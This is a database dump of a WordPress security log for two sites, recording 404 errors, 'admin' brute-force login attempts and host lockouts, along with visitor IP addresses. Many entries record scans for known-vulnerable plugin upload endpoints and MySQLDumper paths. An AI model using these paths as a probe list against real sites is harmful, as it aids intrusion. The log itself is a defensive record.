(85627, 'four_oh_four', '404 Error', 3, '2018-04-24 19:00:58', '2018-04-25 00:00:58', '178.159.37.126', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85628, 'four_oh_four', '404 Error', 3, '2018-04-24 19:00:59', '2018-04-25 00:00:59', '178.159.37.126', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85629, 'four_oh_four', '404 Error', 3, '2018-04-24 19:14:50', '2018-04-25 00:14:50', '207.46.13.26', '', 0, '/contacts', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85630, 'four_oh_four', '404 Error', 3, '2018-04-24 19:14:51', '2018-04-25 00:14:51', '207.46.13.26', '', 0, '/certified-practitioners/4154626692/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85631, 'four_oh_four', '404 Error', 3, '2018-04-24 19:14:52', '2018-04-25 00:14:52', '207.46.13.26', '', 0, '/certified-practitioners/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85632, 'four_oh_four', '404 Error', 3, '2018-04-24 19:14:58', '2018-04-25 00:14:58', '207.46.13.28', '', 0, '/www-baratorosherun-top/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85633, 'four_oh_four', '404 Error', 3, '2018-04-24 19:15:41', '2018-04-25 00:15:41', '207.46.13.26', '', 0, '/price', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85634, 'four_oh_four', '404 Error', 3, '2018-04-24 19:31:40', '2018-04-25 00:31:40', '35.189.92.192', '', 0, '/components/com_jdownloads/jdownloads.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85635, 'four_oh_four', '404 Error', 3, '2018-04-24 19:31:41', '2018-04-25 00:31:41', '35.189.92.192', '', 0, '/wp-content/plugins/revslider/js/settings.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85636, 'four_oh_four', '404 Error', 3, '2018-04-24 19:31:42', '2018-04-25 00:31:42', '35.189.92.192', '', 0, '/wp-content/plugins/showbiz/js/admin.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85637, 'four_oh_four', '404 Error', 3, '2018-04-24 20:24:17', '2018-04-25 01:24:17', '66.249.69.99', '', 0, '/program-2', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85638, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-24 22:00:55', '2018-04-25 03:00:55', '163.172.223.200', 'admin', 0, '', '', 'a:0:{}'),
(85639, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-24 22:00:55', '2018-04-25 03:00:55', '163.172.223.200', 'admin', 0, '', '', 'a:0:{}'),
(85640, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-24 22:00:55', '2018-04-25 03:00:55', '163.172.223.200', 'admin', 0, '', '', 'a:0:{}'),
(85641, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-24 22:00:55', '2018-04-25 03:00:55', '163.172.223.200', 'admin', 0, '', '', 'a:0:{}'),
(85642, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-24 22:00:55', '2018-04-25 03:00:55', '163.172.223.200', 'admin', 0, '', '', 'a:0:{}'),
(85643, 'lockout', 'Host or User Lockout', 10, '2018-04-24 22:00:55', '2018-04-25 03:00:55', '163.172.223.200', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-24 22:15:55";s:11:"expires_gmt";s:19:"2018-04-25 03:15:55";s:4:"type";s:11:"brute_force";}'),
(85644, 'four_oh_four', '404 Error', 3, '2018-04-24 22:24:40', '2018-04-25 03:24:40', '192.227.247.209', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85645, 'four_oh_four', '404 Error', 3, '2018-04-24 22:24:41', '2018-04-25 03:24:41', '192.227.247.209', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85646, 'four_oh_four', '404 Error', 3, '2018-04-24 22:41:20', '2018-04-25 03:41:20', '180.76.15.139', '', 0, '/wp-includes/js/mediaelement/\\\\\\\\\\\\\\''+a.scheme+', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85647, 'four_oh_four', '404 Error', 3, '2018-04-24 22:50:25', '2018-04-25 03:50:25', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(85648, 'four_oh_four', '404 Error', 3, '2018-04-24 22:50:26', '2018-04-25 03:50:26', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://www.globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(85649, 'four_oh_four', '404 Error', 3, '2018-04-24 23:37:18', '2018-04-25 04:37:18', '123.231.113.51', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85650, 'four_oh_four', '404 Error', 3, '2018-04-25 00:12:08', '2018-04-25 05:12:08', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85651, 'four_oh_four', '404 Error', 3, '2018-04-25 00:12:08', '2018-04-25 05:12:08', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85652, 'four_oh_four', '404 Error', 3, '2018-04-25 00:12:11', '2018-04-25 05:12:11', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85653, 'four_oh_four', '404 Error', 3, '2018-04-25 00:12:12', '2018-04-25 05:12:12', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85654, 'four_oh_four', '404 Error', 3, '2018-04-25 01:21:10', '2018-04-25 06:21:10', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85655, 'four_oh_four', '404 Error', 3, '2018-04-25 01:21:11', '2018-04-25 06:21:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85656, 'four_oh_four', '404 Error', 3, '2018-04-25 01:21:14', '2018-04-25 06:21:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85657, 'four_oh_four', '404 Error', 3, '2018-04-25 01:21:14', '2018-04-25 06:21:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85658, 'four_oh_four', '404 Error', 3, '2018-04-25 01:59:16', '2018-04-25 06:59:16', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85659, 'four_oh_four', '404 Error', 3, '2018-04-25 01:59:18', '2018-04-25 06:59:18', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85660, 'four_oh_four', '404 Error', 3, '2018-04-25 02:08:47', '2018-04-25 07:08:47', '124.104.113.52', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85661, 'four_oh_four', '404 Error', 3, '2018-04-25 02:21:37', '2018-04-25 07:21:37', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85662, 'four_oh_four', '404 Error', 3, '2018-04-25 02:31:48', '2018-04-25 07:31:48', '162.243.166.137', '', 0, '/global-belief-relief/TPjiZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85663, 'four_oh_four', '404 Error', 3, '2018-04-25 02:37:13', '2018-04-25 07:37:13', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85664, 'four_oh_four', '404 Error', 3, '2018-04-25 02:49:04', '2018-04-25 07:49:04', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85665, 'four_oh_four', '404 Error', 3, '2018-04-25 02:54:29', '2018-04-25 07:54:29', '91.116.195.94', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85666, 'four_oh_four', '404 Error', 3, '2018-04-25 03:38:49', '2018-04-25 08:38:49', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85667, 'four_oh_four', '404 Error', 3, '2018-04-25 03:52:31', '2018-04-25 08:52:31', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85668, 'four_oh_four', '404 Error', 3, '2018-04-25 04:02:23', '2018-04-25 09:02:23', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85669, 'four_oh_four', '404 Error', 3, '2018-04-25 04:48:55', '2018-04-25 09:48:55', '58.191.228.57', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85670, 'four_oh_four', '404 Error', 3, '2018-04-25 04:49:24', '2018-04-25 09:49:24', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85671, 'four_oh_four', '404 Error', 3, '2018-04-25 04:51:37', '2018-04-25 09:51:37', '113.102.17.78', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85672, 'four_oh_four', '404 Error', 3, '2018-04-25 04:51:38', '2018-04-25 09:51:38', '113.102.17.78', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85673, 'four_oh_four', '404 Error', 3, '2018-04-25 05:01:45', '2018-04-25 10:01:45', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85674, 'four_oh_four', '404 Error', 3, '2018-04-25 05:23:04', '2018-04-25 10:23:04', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85675, 'four_oh_four', '404 Error', 3, '2018-04-25 05:23:33', '2018-04-25 10:23:33', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85676, 'four_oh_four', '404 Error', 3, '2018-04-25 05:48:26', '2018-04-25 10:48:26', '58.216.61.47', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85677, 'four_oh_four', '404 Error', 3, '2018-04-25 05:48:27', '2018-04-25 10:48:27', '58.216.61.47', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85678, 'four_oh_four', '404 Error', 3, '2018-04-25 05:51:24', '2018-04-25 10:51:24', '46.99.123.220', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85679, 'four_oh_four', '404 Error', 3, '2018-04-25 05:51:35', '2018-04-25 10:51:35', '137.74.247.73', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85680, 'four_oh_four', '404 Error', 3, '2018-04-25 05:51:36', '2018-04-25 10:51:36', '137.74.247.73', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85681, 'four_oh_four', '404 Error', 3, '2018-04-25 06:01:26', '2018-04-25 11:01:26', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85682, 'four_oh_four', '404 Error', 3, '2018-04-25 06:34:15', '2018-04-25 11:34:15', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85683, 'four_oh_four', '404 Error', 3, '2018-04-25 06:34:16', '2018-04-25 11:34:16', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85684, 'four_oh_four', '404 Error', 3, '2018-04-25 06:36:35', '2018-04-25 11:36:35', '91.200.12.98', '', 0, '/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'http://www.clearyourbeliefs.org/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(85685, 'four_oh_four', '404 Error', 3, '2018-04-25 06:36:37', '2018-04-25 11:36:37', '91.200.12.98', '', 0, '/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'http://www.clearyourbeliefs.com/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(85686, 'four_oh_four', '404 Error', 3, '2018-04-25 06:36:43', '2018-04-25 11:36:43', '93.87.61.225', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85687, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:08', '2018-04-25 11:55:08', '195.22.127.231', '', 0, '/MSD/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85688, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:09', '2018-04-25 11:55:09', '195.22.127.231', '', 0, '/Msd/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85689, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:10', '2018-04-25 11:55:10', '195.22.127.231', '', 0, '/MySQLDumper1.24.4/msd1.24.4/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85690, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:11', '2018-04-25 11:55:11', '195.22.127.231', '', 0, '/MySQLDumper1.24.4/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85691, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:12', '2018-04-25 11:55:12', '195.22.127.231', '', 0, '/MySQLDumper1.24.4stable/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85692, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:14', '2018-04-25 11:55:14', '195.22.127.231', '', 0, '/MySqlDumper/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85693, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:15', '2018-04-25 11:55:15', '195.22.127.231', '', 0, '/Mysqldumper/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85694, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:16', '2018-04-25 11:55:16', '195.22.127.231', '', 0, '/admin/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85695, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:17', '2018-04-25 11:55:17', '195.22.127.231', '', 0, '/admin/sql/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85696, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:18', '2018-04-25 11:55:18', '195.22.127.231', '', 0, '/backup/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85697, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:19', '2018-04-25 11:55:19', '195.22.127.231', '', 0, '/backups/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85698, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:20', '2018-04-25 11:55:20', '195.22.127.231', '', 0, '/database/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85699, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:21', '2018-04-25 11:55:21', '195.22.127.231', '', 0, '/datenbank/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85700, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:22', '2018-04-25 11:55:22', '195.22.127.231', '', 0, '/dump/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85701, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:24', '2018-04-25 11:55:24', '195.22.127.231', '', 0, '/dumper/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85702, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:25', '2018-04-25 11:55:25', '195.22.127.231', '', 0, '/msd/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85703, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:26', '2018-04-25 11:55:26', '195.22.127.231', '', 0, '/msd1.24.2/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85704, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:27', '2018-04-25 11:55:27', '195.22.127.231', '', 0, '/msd1.24.3/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85705, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:28', '2018-04-25 11:55:28', '195.22.127.231', '', 0, '/msd1.24.4/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85706, 'four_oh_four', '404 Error', 3, '2018-04-25 06:55:29', '2018-04-25 11:55:29', '195.22.127.231', '', 0, '/msd1.24stable/sql.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85707, 'lockout', 'Host or User Lockout', 10, '2018-04-25 06:55:29', '2018-04-25 11:55:29', '195.22.127.231', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-25 07:10:29";s:11:"expires_gmt";s:19:"2018-04-25 12:10:29";s:4:"type";s:12:"four_oh_four";}'),
(85708, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 07:06:34', '2018-04-25 12:06:34', '142.44.154.169', 'admin', 0, '', '', 'a:0:{}'),
(85709, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 07:06:34', '2018-04-25 12:06:34', '142.44.154.169', 'admin', 0, '', '', 'a:0:{}'),
(85710, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 07:06:34', '2018-04-25 12:06:34', '142.44.154.169', 'admin', 0, '', '', 'a:0:{}'),
(85711, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 07:06:34', '2018-04-25 12:06:34', '142.44.154.169', 'admin', 0, '', '', 'a:0:{}'),
(85712, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 07:06:34', '2018-04-25 12:06:34', '142.44.154.169', 'admin', 0, '', '', 'a:0:{}'),
(85713, 'lockout', 'Host or User Lockout', 10, '2018-04-25 07:06:34', '2018-04-25 12:06:34', '142.44.154.169', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-25 07:21:34";s:11:"expires_gmt";s:19:"2018-04-25 12:21:34";s:4:"type";s:11:"brute_force";}'),
(85714, 'four_oh_four', '404 Error', 3, '2018-04-25 07:08:40', '2018-04-25 12:08:40', '154.160.17.18', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85715, 'four_oh_four', '404 Error', 3, '2018-04-25 07:18:36', '2018-04-25 12:18:36', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85716, 'four_oh_four', '404 Error', 3, '2018-04-25 07:18:38', '2018-04-25 12:18:38', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85717, 'four_oh_four', '404 Error', 3, '2018-04-25 07:21:46', '2018-04-25 12:21:46', '207.46.13.27', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85718, 'four_oh_four', '404 Error', 3, '2018-04-25 07:46:10', '2018-04-25 12:46:10', '91.200.12.193', '', 0, '/global-belief-relief/wp-content/plugins/complete-gallery-manager/frames/upload-images.php', 'http://globalbeliefrelief.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85719, 'four_oh_four', '404 Error', 3, '2018-04-25 07:46:53', '2018-04-25 12:46:53', '91.200.12.193', '', 0, '/global-belief-relief/wp-content/plugins/wp-easycart/inc/amfphp/administration/', 'http://globalbeliefrelief.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85720, 'four_oh_four', '404 Error', 3, '2018-04-25 08:01:59', '2018-04-25 13:01:59', '154.160.17.18', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85721, 'four_oh_four', '404 Error', 3, '2018-04-25 08:49:15', '2018-04-25 13:49:15', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85722, 'four_oh_four', '404 Error', 3, '2018-04-25 08:49:17', '2018-04-25 13:49:17', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85723, 'four_oh_four', '404 Error', 3, '2018-04-25 08:59:01', '2018-04-25 13:59:01', '14.165.194.11', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85724, 'four_oh_four', '404 Error', 3, '2018-04-25 08:59:02', '2018-04-25 13:59:02', '14.165.194.11', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85725, 'four_oh_four', '404 Error', 3, '2018-04-25 10:19:55', '2018-04-25 15:19:55', '66.249.75.89', '', 0, '/cyb/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85726, 'four_oh_four', '404 Error', 3, '2018-04-25 10:23:55', '2018-04-25 15:23:55', '82.78.49.203', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85727, 'four_oh_four', '404 Error', 3, '2018-04-25 10:47:47', '2018-04-25 15:47:47', '193.70.34.209', '', 0, '/global-belief-relief/update.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85728, 'four_oh_four', '404 Error', 3, '2018-04-25 10:58:09', '2018-04-25 15:58:09', '66.249.69.99', '', 0, '/video/127646104/fallback', '', 'a:1:{s:12:"query_string";s:8:"noscript";}'),
(85729, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85730, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85731, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85732, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85733, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85734, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85735, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', 'admin', 0, '', '', 'a:0:{}'),
(85736, 'lockout', 'Host or User Lockout', 10, '2018-04-25 11:13:01', '2018-04-25 16:13:01', '176.36.20.10', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-25 11:28:01";s:11:"expires_gmt";s:19:"2018-04-25 16:28:01";s:4:"type";s:11:"brute_force";}'),
(85737, 'four_oh_four', '404 Error', 3, '2018-04-25 11:47:44', '2018-04-25 16:47:44', '113.102.17.91', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85738, 'four_oh_four', '404 Error', 3, '2018-04-25 11:47:45', '2018-04-25 16:47:45', '113.102.17.91', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85739, 'four_oh_four', '404 Error', 3, '2018-04-25 11:51:26', '2018-04-25 16:51:26', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85740, 'four_oh_four', '404 Error', 3, '2018-04-25 11:51:46', '2018-04-25 16:51:46', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(85741, 'four_oh_four', '404 Error', 3, '2018-04-25 11:52:08', '2018-04-25 16:52:08', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85742, 'four_oh_four', '404 Error', 3, '2018-04-25 11:52:22', '2018-04-25 16:52:22', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85743, 'four_oh_four', '404 Error', 3, '2018-04-25 12:07:47', '2018-04-25 17:07:47', '158.69.244.200', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85744, 'four_oh_four', '404 Error', 3, '2018-04-25 12:07:48', '2018-04-25 17:07:48', '158.69.244.200', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85745, 'four_oh_four', '404 Error', 3, '2018-04-25 12:56:34', '2018-04-25 17:56:34', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85746, 'four_oh_four', '404 Error', 3, '2018-04-25 12:56:37', '2018-04-25 17:56:37', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85747, 'four_oh_four', '404 Error', 3, '2018-04-25 13:07:08', '2018-04-25 18:07:08', '39.37.164.7', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85748, 'four_oh_four', '404 Error', 3, '2018-04-25 13:08:36', '2018-04-25 18:08:36', '91.200.12.193', '', 0, '/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'http://clearyourbeliefs.org/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85749, 'four_oh_four', '404 Error', 3, '2018-04-25 13:08:36', '2018-04-25 18:08:36', '91.200.12.193', '', 0, '/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'http://clearyourbeliefs.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85750, 'four_oh_four', '404 Error', 3, '2018-04-25 13:32:08', '2018-04-25 18:32:08', '206.223.244.99', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85751, 'four_oh_four', '404 Error', 3, '2018-04-25 13:32:09', '2018-04-25 18:32:09', '206.223.244.99', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85752, 'four_oh_four', '404 Error', 3, '2018-04-25 14:11:14', '2018-04-25 19:11:14', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85753, 'four_oh_four', '404 Error', 3, '2018-04-25 14:29:34', '2018-04-25 19:29:34', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85754, 'four_oh_four', '404 Error', 3, '2018-04-25 14:32:47', '2018-04-25 19:32:47', '108.160.95.143', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85755, 'four_oh_four', '404 Error', 3, '2018-04-25 14:32:48', '2018-04-25 19:32:48', '108.160.95.143', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85756, 'four_oh_four', '404 Error', 3, '2018-04-25 14:32:51', '2018-04-25 19:32:51', '108.160.95.143', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85757, 'four_oh_four', '404 Error', 3, '2018-04-25 14:32:51', '2018-04-25 19:32:51', '108.160.95.143', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85758, 'four_oh_four', '404 Error', 3, '2018-04-25 14:57:14', '2018-04-25 19:57:14', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85759, 'four_oh_four', '404 Error', 3, '2018-04-25 15:07:22', '2018-04-25 20:07:22', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85760, 'four_oh_four', '404 Error', 3, '2018-04-25 15:10:07', '2018-04-25 20:10:07', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85761, 'four_oh_four', '404 Error', 3, '2018-04-25 15:16:10', '2018-04-25 20:16:10', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
